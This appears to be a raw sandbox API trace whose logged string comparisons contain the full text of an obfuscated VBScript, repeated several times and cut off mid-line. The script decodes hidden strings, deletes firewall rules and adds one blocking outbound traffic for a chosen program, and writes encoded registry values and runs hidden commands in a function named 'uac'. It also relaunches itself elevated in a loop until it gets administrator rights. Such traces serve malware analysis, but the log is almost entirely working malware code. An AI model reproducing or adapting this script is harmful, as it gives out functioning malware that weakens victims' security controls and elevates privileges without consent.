bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 107 [0226.282] wcsncmp (_String1="\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 29 [0226.282] wcsncmp (_String1="\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0226.282] wcsncmp (_String1="Dim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 55 [0226.282] wcsncmp (_String1="im sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run 